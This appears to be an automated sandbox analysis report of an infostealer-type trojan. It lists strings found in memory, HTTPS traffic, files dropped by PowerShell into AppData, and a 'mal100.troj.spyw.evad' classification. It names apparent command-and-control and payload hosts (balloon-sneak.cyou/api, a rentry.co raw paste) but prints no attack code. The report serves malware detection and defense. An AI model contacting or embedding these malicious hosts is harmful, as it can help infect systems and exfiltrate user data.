              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD668B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000E.00000002.2588541617.0000000004D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: msiexec.exe, 0000000B.00000002.2580158081.0000000003378000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2579037828.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2396539697.0000000005EFF000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2506550494.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balloon-sneak.cyou/
              Source: msiexec.exe, 0000000B.00000002.2580158081.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balloon-sneak.cyou/_(
              Source: msiexec.exe, 0000000B.00000003.2578964271.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2571882490.000000000341F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2261960503.000000000340D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2506746140.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2446882462.0000000003411000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2460501065.000000000341F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580158081.0000000003393000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2441713567.0000000003411000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580443477.000000000341F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2261992568.000000000340E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2439380728.000000000341F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2441223108.000000000340E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2506321728.000000000341F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balloon-sneak.cyou/api
              Source: msiexec.exe, 0000000B.00000003.2571882490.000000000341F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580443477.000000000341F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balloon-sneak.cyou/apiP
              Source: msiexec.exe, 0000000B.00000003.2439380728.000000000341F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balloon-sneak.cyou/apim
              Source: msiexec.exe, 0000000B.00000003.2506746140.00000000033A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balloon-sneak.cyou:443/api
              Source: msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: devtools_resources.pak.0.drString found in binary or memory: https://chrome-devtools-frontend.appspot.com
              Source: devtools_resources.pak.0.drString found in binary or memory: https://chromedevtools.github.io/devtools-protocol/tot/$
              Source: msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: devtools_resources.pak.0.drString found in binary or memory: https://developer.chrome.com/devtools/docs/remote-debugging#port-forwarding
              Source: devtools_resources.pak.0.drString found in binary or memory: https://developers.google.com
              Source: devtools_resources.pak.0.drString found in binary or memory: https://developers.google.com/chrome-developer-tools/docs/remote-debugging
              Source: devtools_resources.pak.0.drString found in binary or memory: https://developers.google.com/web/fundamentals/accessibility/accessible-styles#color_and_contrast
              Source: devtools_resources.pak.0.drString found in binary or memory: https://developers.google.com/web/fundamentals/engage-and-retain/web-app-manifest/?utm_source=devtoo
              Source: devtools_resources.pak.0.drString found in binary or memory: https://developers.google.com/web/tools/chrome-devtools/
              Source: devtools_resources.pak.0.drString found in binary or memory: https://developers.google.com/web/tools/chrome-devtools/network/?utm_source=devtools&utm_campaign=20
              Source: devtools_resources.pak.0.drString found in binary or memory: https://developers.google.com/web/tools/chrome-devtools/progressive-web-apps#opaque-responses
              Source: devtools_resources.pak.0.drString found in binary or memory: https://developers.google.com/web/tools/chrome-devtools/sources?utm_source=devtools&utm_campaign=201
              Source: devtools_resources.pak.0.drString found in binary or memory: https://developers.google.com/web/tools/lighthouse/
              Source: devtools_resources.pak.0.drString found in binary or memory: https://developers.google.com/web/tools/lighthouse/)
              Source: devtools_resources.pak.0.drString found in binary or memory: https://docs.google.com/forms/d/e/1FAIpQLSchz2FdcQ-rRllzl8BbhWaTRRY-12BpPjW6Hr9e1-BpCA083w/viewform
              Source: msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: devtools_resources.pak.0.drString found in binary or memory: https://github.com/WICG/webpackage
              Source: msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: devtools_resources.pak.0.drString found in binary or memory: https://nodejs.org/en/docs/inspector/
              Source: devtools_resources.pak.0.drString found in binary or memory: https://nodejs.org/static/images/logos/nodejs-new-pantone-black.png
              Source: msiexec.exe, 0000000B.00000003.2579037828.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/
              Source: msiexec.exe, 0000000B.00000002.2580282480.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2579037828.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/e
              Source: msiexec.exe, 0000000B.00000003.2578964271.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2571882490.000000000341F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/feouewe5/raw
              Source: msiexec.exe, 0000000B.00000003.2578964271.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/feouewe5/rawZ
              Source: devtools_resources.pak.0.drString found in binary or memory: https://support.google.com/chrome/?p=datasaver
              Source: msiexec.exe, 0000000B.00000003.2262938227.0000000005F51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: msiexec.exe, 0000000B.00000003.2350393961.000000000600F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: msiexec.exe, 0000000B.00000003.2350393961.000000000600F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: msiexec.exe, 0000000B.00000003.2262938227.0000000005F4F000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2263146054.0000000005F48000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2302839123.0000000005F48000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2263003093.0000000005F48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: msiexec.exe, 0000000B.00000003.2263003093.0000000005F23000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: msiexec.exe, 0000000B.00000003.2262938227.0000000005F4F000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2263146054.0000000005F48000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2302839123.0000000005F48000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2263003093.0000000005F48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: msiexec.exe, 0000000B.00000003.2263003093.0000000005F23000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.certum.pl/CPS0
              Source: devtools_resources.pak.0.drString found in binary or memory: https://www.chromestatus.com/feature/5629709824032768
              Source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: Setup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.comP/CPS-d
              Source: msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: Setup.exe, 00000003.00000003.1927689834.0000000003611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
              Source: msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: msiexec.exe, 0000000B.00000003.2350393961.000000000600F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: msiexec.exe, 0000000B.00000003.2350393961.000000000600F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: msiexec.exe, 0000000B.00000003.2350393961.000000000600F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: msiexec.exe, 0000000B.00000003.2350393961.000000000600F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: msiexec.exe, 0000000B.00000003.2350393961.000000000600F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49783 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.85:443 -> 192.168.2.4:49795 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.4:49806 version: TLS 1.2

              System Summary

              barindex
              Powershell drops PE file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\Resource.ctJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateClient.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\python27.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\config.prxJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateCommon.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\d3dcompiler_47.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\NAudio.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\Updater.exJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\RcClientBase.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\ffmpeg.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A2CDFC6_2_00007FF764A2CDFC
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A28E006_2_00007FF764A28E00
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A1DDD86_2_00007FF764A1DDD8
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A2EA5C6_2_00007FF764A2EA5C
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A31D846_2_00007FF764A31D84
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A366C46_2_00007FF764A366C4
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A2469C6_2_00007FF764A2469C
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A367A86_2_00007FF764A367A8
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A2D8086_2_00007FF764A2D808
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A31F906_2_00007FF764A31F90
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A240E06_2_00007FF764A240E0
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A1E05C6_2_00007FF764A1E05C
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A33A146_2_00007FF764A33A14
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A221D86_2_00007FF764A221D8
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A2FACC6_2_00007FF764A2FACC
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A19ABC6_2_00007FF764A19ABC
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A36A3C6_2_00007FF764A36A3C
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A2EA5C6_2_00007FF764A2EA5C
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A284146_2_00007FF764A28414
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A21CD86_2_00007FF764A21CD8
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A384D86_2_00007FF764A384D8
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: String function: 00007FF764A16630 appears 48 times
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: String function: 00007FF764A1115C appears 33 times
              Source: Resource.ct.0.drStatic PE information: Number of sections : 14 > 10
              Source: UpdateClient.dll.0.dr, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
              Source: UpdateClient.dll.0.dr, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
              Source: UpdateClient.dll.0.dr, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
              Source: UpdateCommon.dll.0.dr, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
              Source: UpdateCommon.dll.0.dr, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
              Source: UpdateCommon.dll.0.dr, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
              Source: UpdateCommon.dll.0.dr, InstalledModule.csCryptographic APIs: 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@16/213@2/2
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A16728 GetLastError,FormatMessageA,MessageBoxA,fwprintf,LocalFree,6_2_00007FF764A16728
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeCode function: 3_2_00401540 FindResourceA,LoadResource,LockResource,_snprintf,LoadLibraryA,GetProcAddress,strncmp,strncmp,strncmp,UnmapViewOfFile,3_2_00401540
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\tGQPJYHH.zipJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmfxg3z1.x0x.ps1Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeCommand line argument: windows_exe3_2_00401110
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeCommand line argument: sys3_2_00401110
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeCommand line argument: _MessageBox3_2_00401110
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
